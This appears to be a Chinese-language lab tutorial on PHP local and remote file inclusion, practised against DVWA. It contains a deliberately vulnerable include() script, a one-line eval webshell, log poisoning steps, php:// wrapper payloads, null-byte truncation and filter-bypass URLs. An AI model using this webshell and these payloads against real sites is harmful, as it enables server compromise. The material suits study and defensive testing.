文件包含漏洞
简介:
包含操作,在大多数Web语言中都会提供的功能,但PHP对于包含文件所提供的功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中,这也就导致了出现了一个错误现状,很多初学者认为包含漏洞只出现PHP语言之中,殊不知在其他语言中可能出现包含漏洞。这也应了一句老话:功能越强大,漏洞就越多。
文件包含漏洞其本身就是一个严重的漏洞,其产生的原因就是
程序员开发的时候,未对包含的文件进行严格过滤、未部署完善给的权限控制,导致攻击者可构造自己的图片木马文件当作程序执行。
包含主要分为本地和远程;远程需要一定的条件,且苛刻,本地相对容易一些。
测试代码
<?php
$filename = $_GET['filename'];
include($filename);
?>
保存为:include.php
远程文件包含
远程包含优点:不需要将木马传到对方服务器,无论木马在任何地方只要在互联网上服务器,都能包含到目标去。
远程包含缺点:条件苛刻
但前提需要满足以下两个条件:
- 魔术符号关闭
- allow_url_include开启
举例:[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eX9E0rdm-1610795266333)(8、文件上传及文件包含.assets/image-20210106103802542.png)]
本地文件包含
本地包含缺点:必须将脚本或者木马传到目标服务器的本地路径下才能包含。
本地包含优点:相对容易实现。
本地包含图片马实例
利用文件包含漏洞:
本地包含绕过
1、包含漏洞上传技巧(一句话图片马等)
一句话马:
<?php @eval($_POST["123"]);?>
直接连接:
是无法利用的。
利用文件包含漏洞使用蚁剑连接:
是成功的,文件被执行。
2、包含日志文件
当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。
Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中
那么思路就是当我们对一个站点页面提交一句话马,找到其日志文件,利用文件包含漏洞达成连接。(所有的实现均建立在理想的条件下思路,即我们找到了日志路径、具有文件包含漏洞、是apache中间件,不是说百分百,也没有人敢保证百分百。)
首先:
开启通用日志功能
点击“其他选项菜单-打开配置文件-httpd-conf”,打开httpd.conf配置文件,第299行
CustomLog "logs/access.log" common
去掉前边的 # ,并重启apache。
其次,访问一个站点页面,且提交一个一句话马使其留在日志中:
然后寻找一个具有文件包含漏洞的页面进行文件包含日志,在使用蚁剑连接。
http://192.168.18.62:86/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log
3、PHP包含读文件
访问URL,得到经过base64加密后的字符串,注意:convert.base64-encode
经解密还原得到如下:
解码得到以下内容:
4、PHP包含写文件(详解如下)
注意这个想要达成需要满足下面的条件:
-
只有在allow _url_include为on的时候才可以使用
-
同时如果想查看回显结果那必须在C:phpphp-5.2.14-Win32下找到php.ini打开,查找disable_functions = eval,proc-open,oppen,exec,system…….删掉system重启apache。(eval加入的话一句话都连不上了,php中能执行命令的函数加入后,什么都连不上)
(默认是为空的)
注意安全加固中:查找display_funtions=写入相关的命令,达到黑名单的临时加固,真正想用白名单就得让开发的重写相关配置。
构造URL: http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://input,并且提交post数据为:
5、包含截断绕过
执行代码:
<?php
if(isset($_GET['page'])){
include $_GET['page'] .".php" ;
}else{
include 'home.php';
}
?>
//限制了页面包含只能是.php结尾的文件,一般来说用户是不可能上传与中间件同类的文件,所以木马一般都是其他的后缀,那么这里就限制了包含的文件类型。
对上面代码的这种绕过方法只适合于magic_quotes_gpc=off的时候, php版本小于5.3.4,与白名单绕过一致,可通过%00截断绕过,不过现在已经很难见到了,比如:index.php?file=info.txt//////////////…………超过一定数据的/
实例:
6、str_replace函数绕过(字符拼接)
以DVWA的模板为例medium,在代码审计角度上,分析一下下面的代码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", ".."" ), "", $file );
?>
-
使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
-
例如page=hthttp://tp://192.168.0.103/phpinfo.txt时,str_replace函数会将http://删除"一次",于是依然是page=http://192.168.0.103/phpinfo.txt,成功执行远程命令。
-
同时,因为替换的只是“../”、“..”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
例如:
1、本地文件包含交替双写绕过(..././代替../)
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=..././..././robots.txt
2、绝对路径不受任何影响
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3、远程文件包含交替双写绕过
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.18.23/pass.php
7、fnmatch函数绕过(通过内置协议)
以DVWA的模板为例hight,在代码审计角度上,分析一下下面的代码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
if(!fnmatch("file*",$file)&&$file!="include.php")
这段代码的意思就是当文件既不是"include.php"也不是"file"(文件名file开头)时才抛出错误,
反之也就是说,如果文件名符合其中一个条件既可以。http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html 刚好满足"file"(文件名file开头)。说一下这个file://,在本地新建一个[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GszbwUaD-1610795266395)(8、文件上传及文件包含.assets/image-20210106173615792.png)]
然后浏览器打开,得到以下的效果:
当我们以满足要求,绕过fnmatch函数的方式构造了下面的语句:
http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html
直接访问便得到了结果:
PHP内置协议
PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
具体协议请参照http://www.php.net/manual/zh/wrappers.php
常见的一些:
| File:// | 访问本地文件系统 |
|---|---|
| htt[p:// | 访问HTTP(s)网址 |
| ftp:// | 访问FTP(s)URLS |
| php:// | 访问各个输入/输出流(I/o streams) |
| zlib:// | 压缩流 |
| data:// | 数据(RFC2397) |
| ssh2:// | Secure Shell 2 |
| expect:// | 处理交互式的流 |
| glob:// | 查找匹配的文件路径模式 |